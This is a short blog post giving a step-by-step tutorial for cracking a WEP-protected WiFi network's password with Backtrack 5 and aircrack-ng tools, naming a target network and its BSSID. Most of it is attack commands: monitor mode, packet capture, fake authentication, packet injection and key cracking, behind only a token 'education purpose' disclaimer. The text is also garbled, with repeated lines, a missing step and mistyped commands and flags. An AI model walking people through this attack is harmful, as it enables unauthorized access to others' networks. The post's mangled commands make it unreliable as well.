Hacking a WIFI network with Backtrack is quite simple all you have to do is enter certain commands and you are done..However in one of our previous post we have hack WIFI using hydra.
In this tutorial we will be using Backtrack 5 to hack WIFI Password.
NOTE: This Tutorial Is For Education Purpose Only Don't Misuse It,We Will Not Hold Any Responsibility If It Is Being Misused !
Example: airmon-ng start wlan0
Now when the new interface mon0 will be created you can see the new interface by typing " iwconfig mon0 "
In order to speed up the capturing rate open the new terminal and type:
Open new terminal and type
In this tutorial we will be using Backtrack 5 to hack WIFI Password.
NOTE: This Tutorial Is For Education Purpose Only Don't Misuse It,We Will Not Hold Any Responsibility If It Is Being Misused !
Now, Follow These Steps :
Step 1:
Login to your Backtrack linux and plug in the Wifi adapter,then open the new consol and start typing the following commands:
Ifconfig Wlan0 Up
Here wlan0 is the name of wireless card ,it may be different for your case.To see all the connected cards to your system simply type" iwconfig " or you can find it by typing " airmon-ng ".Airmon-Ng Start (Your Interface)
Now when the new interface mon0 will be created you can see the new interface by typing " iwconfig mon0 "
Step 3:
Now you will need to find the WEP network around you,you can do it by typing the following command:
Airdump-Ng Mon0
After typing the coomand you will see all the available WIFI
n this,Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type.
Look for the WEP protected network in this tutorial we are taking "pack" as my target.
Step 4:
In order to carck the WEP you will need to capture all the data of the target into file.To do this type the folllowing command and you need to speed up the process too.
Airodump-Ng Mon0 --Bssid -C (Channel ) -W (File Name To Save )
In my case channel is 6 and has bssid as 00:26:75:06:CF;C6 and i am going to save the captured data as "wep".
Step 5:
Aireplay-Ng - 1 3 -A (Bssid Of The Target ) (Interface)
n my case:
aireplay-ng - 1 3 -a 00:26:75:06:CF;C6 mon0
now type the following command:
aireplay-ng - 1 3 -a 00:26:75:06:CF;C6 mon0
now type the following command:
Aireplay-Ng-2-P 0841 -C Ff:ff:ff:ff:ff:ff -B (Bssid Of Target) (Interface)
And Press "Y" When Asked To Use This Packet.
in my case :
aireplay-ng-2-p 0841 -c ff:ff:ff:ff:ff:ff -b 00:26:75:06:CF;C6 ) mon0
aireplay-ng-2-p 0841 -c ff:ff:ff:ff:ff:ff -b 00:26:75:06:CF;C6 ) mon0
Step 6:
Aircrack-Ng -N 64 -B (Bssid) Saved File
in my case :
aircrack-ng -n 64 -b00:26:75:06:CF;C6 wep
aircrack-ng -n 64 -b00:26:75:06:CF;C6 wep
Once the cracking is successful you will be given Key,just remove the inbetween colons from the key and use it.
If you have any query ..Please comment
If you have any query ..Please comment
With Reguards,
Deep Adhia
No comments:
Post a Comment